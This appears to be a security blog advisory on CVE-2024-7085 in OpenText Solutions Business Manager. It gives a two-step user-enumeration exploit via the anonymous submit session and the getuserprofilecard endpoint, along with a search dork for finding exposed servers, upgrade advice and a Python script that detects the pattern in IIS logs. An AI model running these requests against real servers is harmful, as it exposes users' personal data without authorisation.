CVE-2024-7085 Exposure of Private Information OpenText SBM Exploit

From the project webpage:

OpenText™ Solutions Business Manager is enterprise-scale business process automation software. It helps IT quickly create, adapt, deploy, and govern process-based apps and workflows for humans and systems across the organization.

Summary of the exploit

If the SBM application has anonymous submit enabled on any project, it creates a session for the “Anonymous” user when the AnonymousSubmitPage page is opened. This session can be used to enumerate application users and retrieve their personal information. Without the Anonymous user session, the vulnerable endpoint returns an authentication failure.

Details listed: email address, full name, mobile phone, application role, etc.

Exploit

Step 1: Search for an available AnonymousSubmitPage by iterating the “projectid” parameter:

https://example.com/tmtrack/tmtrack.dll?AnonymousSubmitPage&projectid=1

Once a project with anonymous submit is found, copy the cookies from the response for the next step.

Step 2: Search for users by iterating the “userid” parameter:

https://example.com/tmtrack/tmtrack.dll?JSONPage&command=getuserprofilecard&userid=1

Affected versions

<12.2.1

Check version on:

https://example.com/tmtrack/tmtrack.dll?shell=swc&StdPage&template=newwebadmin/aboutwebadmin.xml&noredirect=true

Google dork

inurl/tmtrack.dll

Mitigation

Update to version 12.2.1 or higher.
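
To check whether the request pattern from the Exploit section already appears in a server's access logs, the following added example (not part of the original post or of OpenText's tooling) counts, per client IP, the distinct “projectid” and “userid” values requested on the two endpoints. It assumes IIS W3C logs with a `#Fields:` header; the function name, the threshold and the sample log lines are constructed for illustration.

```python
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed IIS W3C excerpt (not from a real server); the client addresses
# are taken from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2025-01-10 09:00:01 GET /tmtrack/tmtrack.dll AnonymousSubmitPage&projectid=1 203.0.113.7 200
2025-01-10 09:00:02 GET /tmtrack/tmtrack.dll AnonymousSubmitPage&projectid=2 203.0.113.7 200
2025-01-10 09:00:03 GET /tmtrack/tmtrack.dll AnonymousSubmitPage&projectid=3 203.0.113.7 200
2025-01-10 09:00:05 GET /tmtrack/tmtrack.dll JSONPage&command=getuserprofilecard&userid=1 203.0.113.7 200
2025-01-10 09:00:05 GET /tmtrack/tmtrack.dll JSONPage&command=getuserprofilecard&userid=2 203.0.113.7 200
2025-01-10 09:00:06 GET /tmtrack/tmtrack.dll JSONPage&command=getuserprofilecard&userid=3 203.0.113.7 200
2025-01-10 09:00:06 GET /tmtrack/tmtrack.dll JSONPage&command=getuserprofilecard&userid=4 203.0.113.7 200
2025-01-10 09:14:40 GET /tmtrack/tmtrack.dll AnonymousSubmitPage&projectid=3 198.51.100.20 200
2025-01-10 09:20:11 GET /tmtrack/tmtrack.dll AnonymousSubmitPage&projectid=3 198.51.100.20 200
"""

def find_enumeration(log_text, threshold=3):
    """Return {client_ip: {"projectid": n, "userid": n}} for every client that
    requested at least `threshold` distinct ids on either endpoint."""
    fields = []
    seen = defaultdict(lambda: {"projectid": set(), "userid": set()})
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):          # column order comes from the log itself
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith("/tmtrack.dll"):
            continue
        # Page selectors such as "AnonymousSubmitPage" carry no "=", so keep blank values.
        q = parse_qs(row.get("cs-uri-query", "").lower(), keep_blank_values=True)
        ip = row.get("c-ip", "-")
        if "anonymoussubmitpage" in q and "projectid" in q:
            seen[ip]["projectid"].update(q["projectid"])
        elif "jsonpage" in q and q.get("command") == ["getuserprofilecard"]:
            seen[ip]["userid"].update(q.get("userid", []))
    return {ip: {k: len(v) for k, v in ids.items()}
            for ip, ids in seen.items()
            if any(len(v) >= threshold for v in ids.values())}

if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG))
```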

Source: https://www.maerisec.eu/posts/cve-2024-7085/
Author: Maerisec
Published: 2025-01-16
License: CC BY-NC-SA 4.0